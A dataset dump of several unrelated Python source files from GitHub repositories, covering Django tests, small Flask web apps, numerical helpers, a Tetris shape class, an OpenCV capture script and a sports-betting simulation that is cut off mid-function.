name='ajax-stream-updated'),\n\n)\n","repo_name":"mfitzp/django-golifescience","sub_path":"apps/ajax/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74894726247","text":"import gnlogger\nimport logging\n\n# a logger for this module\nmodule_logger = logging.getLogger(__name__)\n\nclass Auxiliary:\n def __init__(self):\n #self.logger = logging.getLogger('spam_application.auxiliary.Auxiliary')\n # a logger for this class\n self.logger = logging.getLogger(str(self.__class__))\n self.logger.info('creating an instance of Auxiliary')\n def do_something(self):\n self.logger.info('doing something')\n a = 1 + 1\n self.logger.info('done doing something')\n\ndef some_function():\n # function uses module logger\n module_logger.info('received a call to \"some_function\"')\n\n\nif __name__ == '__main__':\n\n gnlogger.logconf() # initializes the logging facility\n\n module_logger.info('start this module')\n\n obja = Auxiliary()\n obja.do_something()\n some_function()\n\n module_logger.info('finish this 
module')\n\n\n\n\n\n","repo_name":"git-artes/GNUWiNetwork","sub_path":"gwn/utils/logger/gnlogger_test.py","file_name":"gnlogger_test.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2478158444","text":"import itertools\nimport numpy as np\nfrom ....Classes.ParamExplorerSet import ParamExplorerSet\n\n\ndef get_simulations(self):\n \"\"\"Create simulations and returns them\n\n Returns\n -------\n multisim_dict : dict\n dictionary containing simulation shape, setters, parameter values and simulations generated\n \"\"\"\n # Get reference simulation\n ref_simu = self.parent\n\n # Build the list\n setter_list = [] # Store ParamExplorer setters\n params_value_dict = {} # Store parameter value list per ParamExplorer\n params_symbol_list = [] # Store ParamExplorer symbols\n params_value_list = [] # Store ParamExplorer values to perform cartesian product\n multisim_shape = []\n\n n_param = 0\n # Add values and shape in the list\n for param_explorer in self.paramexplorer_list:\n n_param += 1\n params_value_dict[param_explorer.symbol] = []\n params_symbol_list.append(param_explorer.symbol)\n setter_list.append(param_explorer.setter)\n\n # Generate values\n values = param_explorer.get_value()\n params_value_list.append(values)\n multisim_shape.append(len(values))\n\n if len(params_value_list) > 0:\n self.nb_simu = 1\n for values in params_value_list:\n self.nb_simu *= len(values)\n\n multisim_dict = {\n \"nb_simu\": self.nb_simu, # Shape simulation\n \"paramexplorer_list\": [], # Setter's values\n \"simulation_list\": [],\n }\n\n # Cartesian product to generate every simulation\n for simu_param_values in itertools.product(*params_value_list):\n # Generate the simulation\n new_simu = ref_simu.copy()\n\n # Remove its multisimulation to avoid infinite simulations\n new_simu.var_simu = None\n\n # Store simulation input_values and setters\n input_values = []\n\n # Edit it using setter\n for setter, value, symbol in zip(\n setter_list, simu_param_values, params_symbol_list\n ):\n setter(new_simu, value)\n params_value_dict[symbol].append(value)\n\n # Add the simulation\n multisim_dict[\"simulation_list\"].append(new_simu)\n\n # Create slices to extract ndarrays from multisim_values\n slices = ()\n for _ in multisim_shape:\n slices += (slice(None),)\n\n # Create ParamExplorerValue to be stored in XOutput\n for param_explorer in self.paramexplorer_list:\n multisim_dict[\"paramexplorer_list\"].append(\n ParamExplorerSet(\n name=param_explorer.name,\n symbol=param_explorer.symbol,\n unit=param_explorer.unit,\n setter=param_explorer.setter,\n value=params_value_dict[param_explorer.symbol],\n )\n )\n\n return multisim_dict\n","repo_name":"gverez/pyleecan","sub_path":"pyleecan/Methods/Simulation/VarParam/get_simulations.py","file_name":"get_simulations.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18159798538","text":"import json\n\nfrom main.tests.factories.org_member_factory import ManagerFactory, OrgMemberFactory, DTFactory\nfrom main.tests.factories.organisation_factory import OrganisationFactory\nfrom main.tests.factories.user_factory import UserFactory\nfrom main.tests.factories.entry_factory import EntryFactory\nfrom main.tests.factories.competition_factory import BaseCompetitionFactory\nfrom main.settings import MAX_AUTOCOMPLETE_RESPONSES\nfrom django.test import TestCase, Client\nfrom django.urls import 
reverse\nfrom main.models import OrganisationMembership\n\n\nclass TestOrganisationAPI(TestCase):\n\n def setUp(self):\n self.c = Client()\n self.organisation = OrganisationFactory() # type: Organisation\n self.manager = ManagerFactory(organisation=self.organisation).user\n self.target = reverse('main/organisation_endpoint', kwargs={'org_id': self.organisation.id})\n\n def test_accept_application_base(self):\n self.c.force_login(self.manager)\n applicant = OrgMemberFactory(organisation=self.organisation)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': True})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.DT)\n\n def test_accept_application_unauthorised(self):\n applicant = OrgMemberFactory(organisation=self.organisation)\n for user in [applicant.user, DTFactory(organisation=self.organisation).user]:\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.APPLICANT)\n\n def test_accept_application_already_full_member(self):\n applicant = ManagerFactory(organisation=self.organisation)\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'accept_application',\n 'user_id': applicant.user.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': \"already_full_member\",\n 'verbose_reason': \"User is already a full member\"})\n applicant.refresh_from_db()\n self.assertEqual(applicant.state, OrganisationMembership.MANAGER)\n\n def test_join_organisation_base(self):\n applicant = UserFactory()\n self.c.force_login(applicant)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': True})\n application = applicant.organisationmembership_set.get(organisation=self.organisation)\n self.assertEqual(application.state, OrganisationMembership.APPLICANT)\n\n def test_join_organisation_manager(self):\n applicant = UserFactory()\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': True})\n application = applicant.organisationmembership_set.get(organisation=self.organisation)\n self.assertEqual(application.state, OrganisationMembership.DT)\n\n def test_join_organisation_unauthorised(self):\n applicant = UserFactory()\n user = DTFactory(organisation=self.organisation).user\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n self.assertEqual(applicant.organisationmembership_set.count(), 0)\n\n def test_join_organisation_already_applied(self):\n applicant = UserFactory()\n user = DTFactory(organisation=self.organisation).user\n self.c.force_login(user)\n out = self.c.post(self.target, {'type': 'join_request',\n 'user_id': applicant.id})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n self.assertEqual(applicant.organisationmembership_set.count(), 0)\n\n def test_competitor_autocomplete(self):\n user = DTFactory(organisation=self.organisation).user\n competition = 
BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[0:5]})\n result = json.loads(out.content)\n expected_values = {'name': expected.name, 'license_number': expected.license_number,\n 'club_name': expected.entry_set.latest().club.name}\n self.assertIn(expected_values, result['competitors'])\n\n def test_competitor_autocomplete_short_string(self):\n user = DTFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[0:2]})\n result = json.loads(out.content)\n self.assertEqual(len(result['competitors']), 0)\n\n def test_competitor_limit_response_length(self):\n user = DTFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(MAX_AUTOCOMPLETE_RESPONSES + 1):\n EntryFactory(organisation=self.organisation, competition=competition)\n self.organisation.competitor_set.update(name=\"Roger Rabbit\")\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': 'roger'})\n result = json.loads(out.content)\n self.assertEqual(len(result['competitors']), MAX_AUTOCOMPLETE_RESPONSES)\n\n def test_competitor_autocomplete_unauthorised(self):\n user = OrgMemberFactory(organisation=self.organisation).user\n competition = BaseCompetitionFactory(organisation=self.organisation)\n for _ in range(8):\n EntryFactory(organisation=self.organisation, competition=competition)\n expected = self.organisation.competitor_set.first()\n self.c.force_login(user)\n out = self.c.get(self.target, {'type': 'autocomplete_competitor',\n 'name': expected.name[:5]})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'InsufficientPermissions'})\n\n def test_post_bad_type(self):\n self.c.force_login(self.manager)\n out = self.c.post(self.target, {'type': 'anything_else'})\n self.assertJSONEqual(out.content, {'success': False,\n 'reason': 'unrecognised request',\n 'verbose_reason': 'Unrecognised request'})\n","repo_name":"saty9/allez","sub_path":"main/tests/views/test_organisation_api.py","file_name":"test_organisation_api.py","file_ext":"py","file_size_in_byte":7860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2263318968","text":"import os, secrets, cloudinary.uploader, cloudinary.api, cloudinary\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\nfrom flask_login import login_required, login_user, logout_user, current_user\nfrom application import db, bcrypt, allowed_file, app\nfrom application.model.eatery import User\nfrom application.model.menus import Menus\nfrom werkzeug.utils import secure_filename\nfrom PIL import Image\n\neat = Blueprint('eat',__name__)\n\n@eat.route('/eat')\ndef eatery():\n return 'hi'\n\n@eat.route('/lifeat')\n@login_required\ndef lifeat():\n all_menu = Menus.query.all()\n all_user = User.query.all()\n all_menu.reverse()\n return render_template('chatting.html', all_menu=all_menu, 
all_user=all_user)\n\n@eat.route('/register', methods=['GET'])\ndef register_get():\n auth = '/'\n button = 'how_to_reg'\n return render_template('register.html', auth=auth)\n\n@eat.route('/register', methods=['POST'])\ndef register_post():\n email = request.form.get('email')\n password = request.form.get('password')\n username = request.form.get('username')\n profile_px = request.files['profile_px']\n \n check_user = User.query.filter_by(email=email).first()\n if check_user and check_user.username == username:\n return redirect('/')\n \n filename = secrets.token_hex(16)+'.jpg'\n # profile_px__path = '/home/yashuayaweh/Documents/PROGRAMMING/lifeat/application/static/imgs/profile_px'\n upload_img = cloudinary.uploader.upload(\n profile_px,\n folder = \"lifeat/profile_pix/\",\n public_id=filename,\n overwrite = True,\n resource_type = \"image\"\n )\n img = upload_img['url']\n new_user = User(username=username, email=email, profile_px=img, password=password)\n db.session.add(new_user)\n db.session.commit()\n \n # profile_px.save(os.path.join(profile_px__path, filename))\n # picture = Image.open(os.path.join(profile_px__path, filename))\n # picture.save(os.path.join(profile_px__path , filename), quality=20, optimize=True)\n #this was the previous obsolete code.\n flash('Your account have been created')\n return redirect('/')\n\n\n@eat.route('/', methods=['GET'])\ndef login_get():\n auth = '/register'\n return render_template('login.html', current_user=current_user, auth=auth)\n\n@eat.route('/loginpost', methods=['POST'])\ndef login_post():\n email = request.form.get('email')\n password = request.form.get('password')\n \n search_user = User.query.filter_by(email=email).first()\n if search_user and bcrypt.check_password_hash(search_user.password, password):\n login_user(search_user)\n return redirect('/lifeat')\n \n return redirect('/register')\n\n@eat.route('/makemenu', methods=['GET'])\n@login_required\ndef makemenu_get():\n return render_template('makemenu.html')\n\n@eat.route('/makemenu', methods=['POST'])\n@login_required\ndef makemenu_post():\n image = request.files['image']\n title = request.form.get('title')\n description = request.form.get('description')\n price = request.form.get('price')\n if allowed_file(image.filename):\n filename = secrets.token_hex(16)+'.jpg'\n upload_img = cloudinary.uploader.upload(\n image,\n folder = \"lifeat/menu/\",\n public_id=filename,\n overwrite = True,\n resource_type = \"image\"\n )\n img = upload_img['url']\n newMenu = Menus(title=title, description=description, picture=img, price=price, user_id=current_user.id)\n db.session.add(newMenu)\n db.session.commit()\n # image.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # picture = Image.open(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n # picture.save(os.path.join(app.config['UPLOAD_FOLDER'], filename), quality=20, optimize=True)\n # os.rename(os.path.join(app.config['UPLOAD_FOLDER'], filename), os.path.join(app.config['UPLOAD_FOLDER'], new_name+'.jpg'))\n return redirect('/lifeat')\n\n@eat.route('/user/' , methods=['GET'])\ndef user(user_id):\n user = User.query.get(user_id)\n return render_template('user.html', current_user=current_user, user=user)\n\n@eat.route('/view_menu/', methods=['GET'])\ndef view_menu(id):\n menu = Menus.query.get(id)\n return render_template('view_menu.html', current_user=current_user, menu=menu)\n\n@eat.route('/logout', methods=['GET'])\n@login_required\ndef logout():\n logout_user()\n \n return 
redirect('/')","repo_name":"georgegoldman/lifeat","sub_path":"application/route/eatery.py","file_name":"eatery.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"41623805044","text":"'''\n16 - Create two lists with the same number of elements, then create a third\nlist containing the elements of both lists interleaved. For example,\nif the two lists are [1, 2, 3] and [\"a\", \"b\", \"c\"],\nthe third list should be [1, \"a\", 2, \"b\", 3, \"c\"].\n'''\n\nlista_uno = [1, 2, 3]\nlista_dos = [\"a\", \"b\", \"c\"]\n\nlista_tres = []\n\nfor indice in range(len(lista_uno)):\n    lista_tres.append(lista_uno[indice])\n    lista_tres.append(lista_dos[indice])\n\nprint(lista_tres)","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"4-Ejercicios-Listas-GUIA/16_Ejercicio_tres_list_append.py","file_name":"16_Ejercicio_tres_list_append.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"35610310047","text":"from flask import Flask, request, render_template, redirect, session\nfrom flask_sqlalchemy import SQLAlchemy\n\nTEMPLATE_FOLDER_PATH = '/home/pi/Desktop/ComNet-class-project/HTMLtemplate'\nSTATIC_FOLDER_PATH = '/home/pi/Desktop/ComNet-class-project/static'\n\napp = Flask(__name__, template_folder = TEMPLATE_FOLDER_PATH)\napp._static_folder = STATIC_FOLDER_PATH\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////home/pi/Desktop/ComNet-class-project/database.db'\napp.config['SECRET_KEY'] = 'thisissecret'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n\ndb = SQLAlchemy(app)\n\n#declare necessary parameters\nARGO_PER_HOUR = 5000\n\n#define tables in database\nclass log(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    plat = db.Column(db.String(15))\n    waktu = db.Column(db.String(30))\n\nclass history(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    plat = db.Column(db.String(15))\n    waktuMasuk = db.Column(db.String(30))\n    waktuKeluar = db.Column(db.String(30))\n    argo = db.Column(db.String(8))\n\n@app.route('/')\ndef main():\n    return render_template('main.html')\n\n\n#import necessary functions from utils.py\nfrom utils import *\n\n@app.route('/post', methods = [\"POST\"])\ndef post():\n    plat = request.data\n    plat = plat.decode(\"utf-8\")\n    #returns the fare if the detected plate is already in the database; otherwise, writes the plate to the database
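\n    # Sketch (assumption): processToDatabase is defined in utils.py and is not\n    # shown here; a minimal version consistent with this call might look like:\n    #   def processToDatabase(plat, rate_per_hour):\n    #       entry = log.query.filter_by(plat=plat).first()\n    #       if entry is None:                  # first sighting: log the entry time\n    #           db.session.add(log(plat=plat, waktu=str(datetime.now())))\n    #           db.session.commit()\n    #           return 'logged: ' + plat\n    #       hours = hours_since(entry.waktu)   # hypothetical helper\n    #       return hours * rate_per_hour       # the fare ('argo')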
\n    output = processToDatabase(plat, ARGO_PER_HOUR)\n\n    print(output)\n    \n    return ''\n\n@app.route('/purge', methods = ['GET', 'POST'])\ndef purge():\n    if request.method == 'POST':\n        total_purged = purgeAll(history)\n        return \"Purged: \" + str(total_purged)\n    else:\n        return render_template('purge.html')\n\n@app.route('/viewLog')\ndef viewLog():\n    from mq_new import db, log\n\n    all_query = db.session.query(log).all()\n    data_count = len(all_query)\n\n    \n    return render_template('viewLog.html', data = all_query, data_count = data_count)\n\n@app.route('/viewHistory')\ndef viewHistory():\n    from mq_new import db, history\n\n    all_query = db.session.query(history).all()\n    data_count = len(all_query)\n\n    \n    return render_template('viewHistory.html', data = all_query, data_count = data_count)\n\n@app.route('/aboutUs')\ndef aboutUs():\n    return render_template('aboutUs.html')\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port= 8090)\n","repo_name":"AldyKwee/ComNet-Class-Project","sub_path":"Phase-3_Ticketing/RASPBERRY PI SOURCE CODE/Previous Code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"6093087995","text":"import numpy as np\nimport math\n\nfrom numba import vectorize\nfrom numba import jit\n\n\ndef smooth(x,window_len=11,window='hanning'):\n    \"\"\"smooth the data using a window with requested size.\n    \n    This method is based on the convolution of a scaled window with the signal.\n    The signal is prepared by introducing reflected copies of the signal \n    (with the window size) in both ends so that transient parts are minimized\n    in the beginning and end part of the output signal.\n    \n    input:\n        x: the input signal \n        window_len: the dimension of the smoothing window; should be an odd integer\n        window: the type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\n            flat window will produce a moving average smoothing.\n\n    output:\n        the smoothed signal\n        \n    example:\n\n    t=linspace(-2,2,0.1)\n    x=sin(t)+randn(len(t))*0.1\n    y=smooth(x)\n    \n    see also: \n    \n    numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve\n    scipy.signal.lfilter\n    \n    TODO: the window parameter could be the window itself if an array instead of a string\n    NOTE: length(output) != length(input), to correct this: return y[(window_len/2-1):-(window_len/2)] instead of just y.\n    \"\"\"\n\n    if x.ndim != 1:\n        raise ValueError(\"smooth only accepts 1 dimension arrays.\")\n\n    if x.size < window_len:\n        raise ValueError(\"Input vector needs to be bigger than window size.\")\n\n    if window_len<3:\n        return x\n\n    if window not in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']:\n        raise ValueError(\"Window must be one of 'flat', 'hanning', 'hamming', 'bartlett', 'blackman'\")\n\n    s=np.r_[x[window_len-1:0:-1],x,x[-1:-window_len:-1]]\n    #print(len(s))\n    if window == 'flat': #moving average\n        w=np.ones(window_len,'d')\n    else:\n        # look the window function up on np; the module is imported as np, so\n        # the original eval('numpy.'+window+'(window_len)') raised a NameError\n        w=getattr(np, window)(window_len)\n\n    y=np.convolve(w/w.sum(),s,mode='valid')\n    \n    #return y\n    return y[(int(window_len/2)-1):-(int(window_len/2))]\n\ndef count_zero(a): \n    eps = 1e-5\n    #vals = a[a < eps]\n    vals = np.where(a < min_vel_in_pixels, 1, 0)\n    \n    if len(vals) == 0:\n        return 0.0\n    else:\n        return np.sum(vals)\n    \ndef max_outliers(a): \n    eps = 1e-5\n    #vals = a[a < eps]\n    vals = np.where(a > max_vel_in_pixels, a, 0)\n    \n    if len(vals) == 0:\n        return 0.0\n    else:\n        return np.max(vals)\n
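\n# Note (assumption): the threshold names used above and below --\n# min_vel_in_pixels, max_vel_in_pixels and min_corr_value -- are not defined in\n# this file; they are presumably set as module-level globals by the calling\n# analysis script, e.g.:\n#   min_vel_in_pixels = 0.5    # hypothetical values\n#   max_vel_in_pixels = 50.0\n#   min_corr_value = 0.3\n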
\ndef high_corr(a): \n    eps = 1e-5\n    #vals = a[a < eps]\n    vals = np.where(a > min_corr_value, a, 0)\n    \n    if len(vals) == 0:\n        return 0.0\n    else:\n        return np.mean(vals)\n    \ndef low_corr(a): \n    eps = 1e-5\n    #vals = a[a < eps]\n    vals = np.where(a < min_corr_value, a, 0)\n    \n    if len(vals) == 0:\n        return 0.0\n    else:\n        return np.mean(vals)\n    \ndef avg_nonzero(a): \n    \n    non_zero_vals = a[a > 0]\n    \n    if len(non_zero_vals) == 0:\n        return 0.0\n    else:\n        return np.mean(non_zero_vals)\n    \ndef std_nonzero(a): \n    \n    non_zero_vals = a[a != 0]\n    \n    if len(non_zero_vals) == 0:\n        return 0.0\n    else:\n        return np.std(non_zero_vals)\n    \n@jit\ndef avg_non_zero_numba(a):\n    num = 0\n    sum_val = 0\n    \n    for i in range(len(a)):\n        if a[i] > 0:\n            sum_val += a[i]\n            num += 1\n    if num == 0:\n        return 0\n    \n    return sum_val / num\n\n@jit\ndef avg_non_zero_full(a):\n    \n    nz = a.shape[0]\n    ny = a.shape[1]\n    nx = a.shape[2]\n    \n    res = np.zeros_like(a[0])\n    \n    for i in range(ny):\n        for j in range(nx):\n            \n            num = 0\n            sum_val = 0\n            \n            for k in range(nz):\n\n                val = a[k,i,j]\n                \n                if val != 0:\n                    sum_val += val \n                    num += 1\n            \n            if num == 0:\n                res[i,j] = 0\n            else:\n                res[i,j] = sum_val / num \n            \n    return res\n    \ndef mul3(a, b, c):\n    return a*b*c\n\ndef mul4(a, b, c, d):\n    return a*b*c*d\n\nvec_mul3 = vectorize('float64(float64, float64, float64)', target='parallel')(mul3)\nvec_mul4 = vectorize('float64(float64, float64, float64, float64)', target='parallel')(mul4)","repo_name":"axruff/spraylab","sub_path":"numerics.py","file_name":"numerics.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"24731022038","text":"import random\n\nclass BlockType(): # the seven tetromino types\n    NoShape = 0\n    ZShape = 1\n    LShape = 2\n    TShape = 3\n    OShape = 4\n    IShape = 5\n    SShape = 6\n    _IShape = 7\n\n    init_shape = ( # relative coordinates of each piece's cells\n        (), # None\n        ((-1, 0), (0, 0), ( 0, -1), (1, -1)), # Z\n        (( 0, 1), (0, 0), ( 0, -1), (1, -1)), # L\n        ((-1, 0), (0, 0), ( 1, 0), (0, -1)), # T\n        ((-1, 0), (0, 0), (-1, -1), (0, -1)), # O (square)\n        (( 0, 1), (0, 0), ( 0, -1), (0, -2)), # I\n        (( 1, 0), (0, 0), ( 0, -1), (-1, -1)), # S (mirror of Z)\n        (( 0, 1), (0, 0), ( 0, -1), (-1, -1)), # _/ (mirror of L)\n    )\n\nclass Shape():\n    def __init__(self):\n        self.vertex = [] # the piece's cells\n        self.type = 0 # the piece's type\n        self.color = '#000000' # the piece's color\n\n    def getRandomShape(self):\n        self.type = random.randint(1,7) # 1 <= N <= 7\n        self.vertex = [ list(v) for v in BlockType.init_shape[self.type] ] # convert every tuple to a mutable list
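\n        # Each piece is stored as four (x, y) cell offsets around a pivot at\n        # (0, 0); e.g. the T entry ((-1, 0), (0, 0), (1, 0), (0, -1)) is a\n        # three-cell row with one cell above its centre.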
\n        # zero-pad to six hex digits so small values still form a valid color,\n        # e.g. 0xf2f5ab -> '#F2F5AB' and 0x00ab12 -> '#00AB12'\n        self.color = '#{:06X}'.format(random.randint(0, 0xffffff))\n\n    def rotate(self, direction): # rotate the piece (the O piece is symmetric)\n        if not self.vertex or self.type == 4:\n            return\n\n        nVertex = []\n        if direction == 'Clockwise':\n            for x, y in self.vertex: # every point becomes (y, -x); from polar coordinates: x' = r*cos(θ-π/2) = r*sin(θ) = y\n                nVertex.append([y, -x])\n\n        else:\n            for x, y in self.vertex:\n                nVertex.append([-y, x])\n\n        self.vertex = nVertex\n\n    def xRange(self): # range of x\n        xList = [v[0] for v in self.vertex]\n        minX = min(xList)\n        maxX = max(xList)\n        return (minX, maxX)\n\n    def yRange(self): # range of y\n        yList = [v[1] for v in self.vertex]\n        minY = min(yList)\n        maxY = max(yList)\n        return (minY, maxY)\n\n\nif __name__ == '__main__':\n    shape = Shape()\n    print(shape.vertex)\n    shape.getRandomShape()\n    print(shape.vertex)\n    shape.rotate('Clockwise')\n    print(shape.vertex)\n    shape.rotate(\"Anticlockwise\")\n    print(shape.vertex)","repo_name":"Brococoli/Tetris-Game","sub_path":"Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"70135374570","text":"# Script to capture images for training and testing.\nimport cv2\nfrom skimage import io, transform\n\n# Create binary image.\ndef binaryMask(frame):\n    roi = frame\n\n    gray = cv2.cvtColor(roi, cv2.COLOR_BGR2GRAY)\n    blur = cv2.GaussianBlur(gray, (5, 5), 2)\n    th3 = cv2.adaptiveThreshold(blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, 11, 2)\n    ret, res = cv2.threshold(th3, 70, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n    return res\n\n# Resize the input image.\ndef reSize(img, output_size):\n    if len(img.shape) < 3:\n        img = img.reshape(img.shape[0], img.shape[1], 1)\n    else:\n        img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n        img = img.reshape(img.shape[0], img.shape[1], 1)\n    img = transform.resize(img, (output_size, output_size), mode='constant')\n    return img\n\n# Capture video image\ncap = cv2.VideoCapture(0)\n\ncv2.namedWindow('Bigger', cv2.WINDOW_NORMAL)\n# fgbg = cv2.createBackgroundSubtractorMOG2()\n# fgbg = cv2.bgsegm.createBackgroundSubtractorMOG(history=1, nmixtures=5, backgroundRatio=0.1, noiseSigma=0.02)\n# fgbg = cv2.createBackgroundSubtractorMOG2(history=0, varThreshold=100, detectShadows=True)\n# set rt size as 640x480\nret = cap.set(3, 400)\nret = cap.set(4, 400)\n\ncount = 0\nwhile True:\n    ret, frame = cap.read()\n    frame = cv2.flip(frame, 1)\n    roi = binaryMask(frame)\n\n    # cv2.imshow('frame', frame)\n    cv2.imshow('roi', roi)\n\n    if cv2.waitKey(1) & 0xFF == ord('g'):\n        count += 1\n        print ('%dth image' % count)\n        resized_img = cv2.resize(roi, (200, 200))\n        cv2.imwrite('./new_test_img/ok' + str(count) + '.png', resized_img)\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Firmamenter/CNN-for-Real-time-Gesture-Recognition-and-Task-Control","sub_path":"CaptureBinary.py","file_name":"CaptureBinary.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"40774182105","text":"import pandas as pd\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\n\nNUM_INDIVIDUAL_PLOTS = 10\nDEFAULT_NUM_SIMS = 2500\nDEFAULT_NUM_TIMES_BETS_REPEATED = 5\nCSV_FILE = 'griffy_bet_history.csv'\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"Simulate sports betting outcomes.\")\n    parser.add_argument(\"--s\", type=int, default=DEFAULT_NUM_SIMS, help=\"Number of simulations to run\")\n    
parser.add_argument(\"--r\", type=int, default=DEFAULT_NUM_TIMES_BETS_REPEATED, help=\"Number of times the bet history is repeated to simulate a longer period\")\n\n args = parser.parse_args()\n num_sims = args.s\n num_times_bets_repeated = args.r\n \n '''\n num_sims: number of simulations to run\n num_times_bets_repeated: number of times the bet history is repeated to simulate a longer period of time\n '''\n\n bets_csv = pd.read_csv(CSV_FILE)\n bets_placed_df = bets_csv[['odds', 'clv', 'stake', 'potential_payout', 'bet_type']]\n bets_placed_df = bets_placed_df[bets_placed_df['bet_type'] == \"positive_ev\"]\n bets_placed_df = bets_placed_df[bets_placed_df[\"clv\"].apply(lambda x: isinstance(x, float))]\n bets_placed_df['clv'] = bets_placed_df['clv'].apply(american_to_percent)\n\n num_positive_outcomes = 0\n num_bets = len(bets_placed_df)\n\n all_sims_df = pd.DataFrame(index=range(num_sims), columns=['sim_index', 'bankroll', 'sim_bankroll_history'])\n\n for i in range(num_sims):\n print(f\"--{i} sims completed out of {num_sims}\", end='\\r')\n individual_sim_df = simulate_bet_history(bets_placed_df, i, NUM_INDIVIDUAL_PLOTS, num_times_bets_repeated)\n all_sims_df.loc[i] = individual_sim_df\n\n all_sims_df[\"sim_bankroll_history\"]\n\n bankrolls = all_sims_df['bankroll']\n\n num_positive_outcomes = len(all_sims_df[all_sims_df['bankroll'] > 0])\n mean_bankroll = bankrolls.mean()\n max_bankroll = bankrolls.max()\n min_bankroll = bankrolls.min()\n break_even_percent = num_positive_outcomes / num_sims\n\n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n\n all_sims_df[all_sims_df['sim_index'] < NUM_INDIVIDUAL_PLOTS].set_index('sim_index')['sim_bankroll_history'].apply(pd.Series).T.plot(ax = ax1, legend = False)\n\n\n ax2.hist(bankrolls, bins = 100, orientation = 'horizontal')\n\n ax1.set_title('Bankroll by Bet Number')\n ax1.set_xlabel('Bet Number')\n ax1.set_ylabel('Bankroll')\n\n ax2.set_title(f'Bankroll Distribution (Mean: {mean_bankroll:.2f})')\n ax2.set_xlabel('Bankroll')\n ax2.set_ylabel('Frequency')\n\n ax2.axhline(y=0, color='r', linestyle='-')\n\n ax3.set_title('Plot of Bankrolls')\n ax3.set_xlabel('Bankroll')\n ax3.set_ylabel('Frequency')\n\n ax3.boxplot(bankrolls, vert = True, showfliers=False, labels=['Bankrolls'])\n quartiles = np.quantile(bankrolls, [0.25, 0.5, 0.75])\n for quartile in quartiles:\n ax3.text(1.1, quartile, f'${quartile:.2f}', horizontalalignment='left', size='medium', color='black', weight='semibold')\n\n min_bankroll = min(bankrolls)\n max_bankroll = max(bankrolls)\n ax1.set_ylim(min_bankroll, max_bankroll)\n ax2.set_ylim(min_bankroll, max_bankroll)\n ax3.set_ylim(min_bankroll, max_bankroll)\n\n fig.set_size_inches(18.5, 10.5)\n\n 